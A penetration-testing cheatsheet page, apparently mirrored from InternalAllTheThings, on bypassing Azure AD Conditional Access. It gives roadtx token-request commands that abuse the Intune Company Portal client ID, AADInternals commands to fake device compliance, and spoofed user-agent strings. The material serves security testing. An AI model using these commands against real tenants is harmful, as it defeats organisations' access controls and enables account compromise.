daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

azure-ad-conditional-access-policy.md (5803B)


      1 ---
      2 title: "Azure AD - Conditional Access Policy"
      3 section: "Cloud"
      4 sectionSlug: "cloud"
      5 sourcePath: "docs/cloud/azure/azure-ad-conditional-access-policy.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/azure/azure-ad-conditional-access-policy.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Azure AD - Conditional Access Policy
     12 
     13 Conditional Access is used to restrict access to resources to compliant devices only.
     14 
     15 * [rbnroot/CAPSlock](https://github.com/rbnroot/CAPSlock) - Offline Conditional Access (CA) analysis tool built on top of a roadrecon database.
     16 * [absolomb/FindMeAccess](https://github.com/absolomb/FindMeAccess) - Tool for finding gaps in Azure/M365 MFA requirements for different resources, client ids, and user agents.
     17 
     18 ## Enumerate Conditional Access Policies
     19 
     20 * Enumerate Conditional Access Policies: `roadrecon plugin policies` (query the local database)
     21 
     22 | CAP                       | Bypass                                                          |
     23 | ------------------------- | --------------------------------------------------------------- |
     24 | Location / IP ranges      | Corporate VPN, Guest Wifi                                       |
     25 | Platform requirement      | User-Agent switcher (Android, PS4, Linux, ...)                  |
     26 | Protocol requirement      | Use another protocol (e.g for e-mail acccess:  POP, IMAP, SMTP) |
     27 | Azure AD Joined Device    | Try to join a VM (Work Access)                                  |
     28 | Compliant Device (Intune) | Fake device compliance                                          |
     29 | Device requirement        | /                                                               |
     30 | MFA                       | /                                                               |
     31 | Legacy Protocols          | /                                                               |
     32 | Domain Joined             | /                                                               |
     33 
     34 ```ps1
     35 python3 CAPSlock.py analyze -u <userprincipalname> --resource <resource-id> [options]
     36 python3 CAPSlock.py what-if -u <userprincipalname> --resource <resource-id> [options]
     37 python3 CAPSlock.py web-gui --port 8080
     38 ```
     39 
     40 ## Bypassing CAP by faking device compliance
     41 
     42 ### Intune Company Portal Client ID Bypass
     43 
     44 Use Intune Company Portal Client ID (`9ba1a5c7-f17a-4de9-a1f1-6178c8d51223`), to run `roadrecon` even when there is a device compliance policy. it is a hardcoded and undocumented exclusion in Conditional Access for device compliance and has the `user_impersonation` rights on the AAD Graph.
     45 
     46 * Client ID: `9ba1a5c7-f17a-4de9-a1f1-6178c8d51223`
     47 
     48 ```ps1
     49 roadtx gettokens -u $username -p $password -r msgraph -ua $windows_ua -c 9ba1a5c7-f17a-4de9-a1f1-6178c8d51223 # limite scope
     50 roadtx gettokens -u $username -p $password -r aadgraph -ua $windows_ua -c 9ba1a5c7-f17a-4de9-a1f1-6178c8d51223 # user_impersonation scope
     51 ```
     52 
     53 ### AAD Internals - Making your device compliant
     54 
     55 ```powershell
     56 # Get an access token for AAD join and save to cache
     57 Get-AADIntAccessTokenForAADJoin -SaveToCache
     58 
     59 # Join the device to Azure AD
     60 Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64"
     61 
     62 # Marking device compliant - option 1: Registering device to Intune
     63 # Get an access token for Intune MDM and save to cache (prompts for credentials)
     64 Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache 
     65 
     66 # Join the device to Intune
     67 Join-AADIntDeviceToIntune -DeviceName "SixByFour"
     68 
     69 # Start the call back
     70 Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour"
     71 ```
     72 
     73 ## Bypassing CAP with device.trustType
     74 
     75 The trustType property is an internal attribute that defines the relationship between the device and Azure AD.
     76 When the condition of CAP is `device.trustType -eq "<TYPE>"`, the values can be:
     77 
     78 * `AzureAD`: Azure AD joined devices
     79 * `Workplace`: Azure AD registered devices
     80 * `ServerAD`: Hybrid joined devices
     81 
     82 ## Bypassing CAP with user agent
     83 
     84 There are several devices you can use to authenticate and interact with a service.
     85 Try several `User-Agent` to get access to the resources:
     86 
     87 * Windows: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 GLS/100.10.9939.100`
     88 * Linux: `Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq`
     89 * macOS: `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq`
     90 * Android: `Mozilla/5.0 (Linux; Android 13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.117 Mobile Safari/537.36`
     91 * iOS: `Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/98.0.4758.85 Mobile/15E148 Safari/604.1`
     92 * WindowsPhone: `Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Lumia 650) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Safari/537.36`
     93 
     94 ## Bypassing CAP with location
     95 
     96 Try different IP locations using a VPN.
     97 
     98 ## References
     99 
    100 * [Bypassing Conditional Access policies that have a resource exclusion - Dirk-jan Mollema - June 22, 2026](https://dirkjanm.io/bypassing-conditional-access-with-resource-exclusion/)
    101 * [Conditional Access bypasses - Fabian Bader - November 30, 2025](https://cloudbrothers.info/en/conditional-access-bypasses/)
    102 * [Finding Entra ID CA Bypasses - the structured way - Dirk-jan Mollema and Fabian Bader - June 23, 2025](https://troopers.de/troopers25/talks/tfsfqs/)
    103 * [STOP THE CAP: Making Entra ID Conditional Access Make Sense Offline - Lee Robinson - February 17, 2026](https://specterops.io/blog/2026/02/17/stop-the-cap-making-entra-id-conditional-access-make-sense-offline/)